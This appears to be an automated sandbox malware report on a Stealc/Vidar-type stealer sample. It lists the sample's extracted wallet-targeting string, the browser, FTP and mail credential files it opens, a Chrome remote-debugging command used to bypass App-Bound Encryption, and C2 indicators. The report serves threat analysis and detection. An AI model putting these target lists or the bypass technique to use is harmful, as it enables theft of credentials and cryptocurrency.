                    Source: WGo3ga1AL9.exe, 00000000.00000002.2313774503.0000000000A74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2313774503.0000000000A74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2313774503.0000000000A74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: WGo3ga1AL9.exe, 00000000.00000002.2313774503.0000000000A74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Tries to harvest and steal Bitcoin Wallet information
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-walJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shmJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shmJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-walJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                    Tries to steal Crypto Currency Wallets
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\Jump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\Jump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004Jump to behavior
                    Source: Yara matchFile source: Process Memory Space: WGo3ga1AL9.exe PID: 7308, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Attempt to bypass Chrome Application-Bound Encryption
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
                    Yara detected Stealc
                    Source: Yara matchFile source: 0.3.WGo3ga1AL9.exe.2500000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.WGo3ga1AL9.exe.2420e67.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.WGo3ga1AL9.exe.2500000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.WGo3ga1AL9.exe.2420e67.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.WGo3ga1AL9.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.WGo3ga1AL9.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000003.1681252718.0000000002500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2314046088.0000000002420000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2313774503.000000000098E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: WGo3ga1AL9.exe PID: 7308, type: MEMORYSTR
                    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Yara detected Vidar stealer
                    Source: Yara matchFile source: Process Memory Space: WGo3ga1AL9.exe PID: 7308, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C7D0C40 sqlite3_bind_zeroblob,0_2_6C7D0C40
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C7D0D60 sqlite3_bind_parameter_name,0_2_6C7D0D60
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C6F8EA0 sqlite3_clear_bindings,0_2_6C6F8EA0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C7D0B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,0_2_6C7D0B40
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C6F6410 bind,WSAGetLastError,0_2_6C6F6410
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C6F6070 PR_Listen,0_2_6C6F6070
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C6FC050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,0_2_6C6FC050
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C6FC030 sqlite3_bind_parameter_count,0_2_6C6FC030
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C6F60B0 listen,WSAGetLastError,0_2_6C6F60B0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C6822D0 sqlite3_bind_blob,0_2_6C6822D0
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_6C6F63C0 PR_Bind,0_2_6C6F63C0

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		1
                    Abuse Elevation Control Mechanism                    		1
                    File and Directory Permissions Modification                    		2
                    OS Credential Dumping                    		2
                    System Time Discovery                    		Remote Services1
                    Archive Collected Data                    		12
                    Ingress Tool Transfer                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts11
                    Native API                    		1
                    Create Account                    		1
                    DLL Side-Loading                    		111
                    Disable or Modify Tools                    		LSASS Memory1
                    Account Discovery                    		Remote Desktop Protocol4
                    Data from Local System                    		21
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts1
                    Service Execution                    		1
                    Windows Service                    		1
                    Extra Window Memory Injection                    		1
                    Deobfuscate/Decode Files or Information                    		Security Account Manager3
                    File and Directory Discovery                    		SMB/Windows Admin Shares1
                    Email Collection                    		1
                    Remote Access Software                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                    Windows Service                    		1
                    Abuse Elevation Control Mechanism                    		NTDS156
                    System Information Discovery                    		Distributed Component Object ModelInput Capture3
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script111
                    Process Injection                    		3
                    Obfuscated Files or Information                    		LSA Secrets561
                    Security Software Discovery                    		SSHKeylogging114
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts23
                    Software Packing                    		Cached Domain Credentials451
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    DLL Side-Loading                    		DCSync12
                    Process Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    Extra Window Memory Injection                    		Proc Filesystem1
                    Application Window Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                    Masquerading                    		/etc/passwd and /etc/shadow1
                    System Owner/User Discovery                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron451
                    Virtualization/Sandbox Evasion                    		Network Sniffing1
                    Remote System Discovery                    		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd111
                    Process Injection                    		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1546262 Sample: WGo3ga1AL9.exe Startdate: 31/10/2024 Architecture: WINDOWS Score: 100 81 osteo9.esalnuvol.com 2->81 107 Suricata IDS alerts for network traffic 2->107 109 Found malware configuration 2->109 111 Malicious sample detected (through community Yara rule) 2->111 113 13 other signatures 2->113 10 WGo3ga1AL9.exe 37 2->10         started        15 updater.exe 2->15         started        17 svchost.exe 1 1 2->17         started        19 svchost.exe 3 8 2->19         started        signatures3 process4 dnsIp5 93 185.235.128.16, 49730, 49754, 49762 ON-LINE-DATAServerlocation-NetherlandsDrontenNL Ukraine 10->93 95 osteo9.esalnuvol.com 87.106.236.48, 443, 49761 ONEANDONE-ASBrauerstrasse48DE Germany 10->95 69 C:\ProgramData\nss3.dll, PE32 10->69 dropped 71 C:\ProgramDatabehaviorgraphDBFCGIIIJ.exe, PE32+ 10->71 dropped 73 C:\Users\user\AppData\...\vcruntime140[1].dll, PE32 10->73 dropped 75 12 other files (none is malicious) 10->75 dropped 117 Detected unpacking (changes PE section rights) 10->117 119 Detected unpacking (overwrites its own PE header) 10->119 121 Attempt to bypass Chrome Application-Bound Encryption 10->121 129 8 other signatures 10->129 21 cmd.exe 1 10->21         started        23 chrome.exe 10->23         started        26 WerFault.exe 21 16 10->26         started        123 Query firmware table information (likely to detect VMs) 15->123 125 Tries to detect sandboxes and other dynamic analysis tools (window names) 15->125 127 Hides threads from debuggers 15->127 131 3 other signatures 15->131 97 127.0.0.1 unknown unknown 17->97 29 WerFault.exe 2 19->29         started        file6 signatures7 process8 dnsIp9 31 GDBFCGIIIJ.exe 1 3 21->31         started        35 conhost.exe 21->35         started        89 192.168.2.4, 443, 49730, 49736 unknown unknown 23->89 91 239.255.255.250 unknown Reserved 23->91 37 chrome.exe 23->37         started        67 C:\ProgramData\Microsoft\...\Report.wer, Unicode 26->67 dropped file10 process11 dnsIp12 77 C:\ProgramDatabehaviorgraphoogle\Chrome\updater.exe, PE32+ 31->77 dropped 79 C:\Windows\System32\drivers\etc\hosts, ASCII 31->79 dropped 99 Query firmware table information (likely to detect VMs) 31->99 101 Uses powercfg.exe to modify the power settings 31->101 103 Modifies the hosts file 31->103 105 6 other signatures 31->105 40 powershell.exe 23 31->40         started        43 cmd.exe 31->43         started        45 sc.exe 31->45         started        47 12 other processes 31->47 83 apis.google.com 37->83 85 plus.l.google.com 142.250.184.206, 443, 49746 GOOGLEUS United States 37->85 87 2 other IPs or domains 37->87 file13 signatures14 process15 signatures16 115 Loading BitLocker PowerShell Module 40->115 49 conhost.exe 40->49         started        51 WmiPrvSE.exe 40->51         started        53 conhost.exe 43->53         started        55 wusa.exe 43->55         started        57 conhost.exe 45->57         started        59 conhost.exe 47->59         started        61 conhost.exe 47->61         started        63 conhost.exe 47->63         started        65 9 other processes 47->65 process17

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    WGo3ga1AL9.exe39%ReversingLabs
                    WGo3ga1AL9.exe100%AviraHEUR/AGEN.1306978
                    WGo3ga1AL9.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\ProgramData\chrome.dll0%ReversingLabs
                    C:\ProgramData\freebl3.dll0%ReversingLabs
                    C:\ProgramData\mozglue.dll0%ReversingLabs
                    C:\ProgramData\msvcp140.dll0%ReversingLabs
                    C:\ProgramData\nss3.dll0%ReversingLabs
                    C:\ProgramData\softokn3.dll0%ReversingLabs
                    C:\ProgramData\vcruntime140.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll0%ReversingLabs

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://anglebug.com/46330%URL Reputationsafe
                    https://anglebug.com/73820%URL Reputationsafe
                    https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.0%URL Reputationsafe
                    https://issuetracker.google.com/2844622630%URL Reputationsafe
                    http://polymer.github.io/AUTHORS.txt0%URL Reputationsafe
                    https://g.live.com/odclientsettings/Prod.C:0%URL Reputationsafe
                    https://anglebug.com/77140%URL Reputationsafe
                    http://anglebug.com/62480%URL Reputationsafe
                    https://ogs.google.com/widget/callout?eom=10%URL Reputationsafe
                    http://anglebug.com/69290%URL Reputationsafe
                    http://anglebug.com/52810%URL Reputationsafe
                    https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b60%URL Reputationsafe
                    https://issuetracker.google.com/2554117480%URL Reputationsafe
                    https://anglebug.com/72460%URL Reputationsafe
                    https://anglebug.com/73690%URL Reputationsafe
                    https://anglebug.com/74890%URL Reputationsafe
                    https://drive-daily-2.corp.google.com/0%URL Reputationsafe
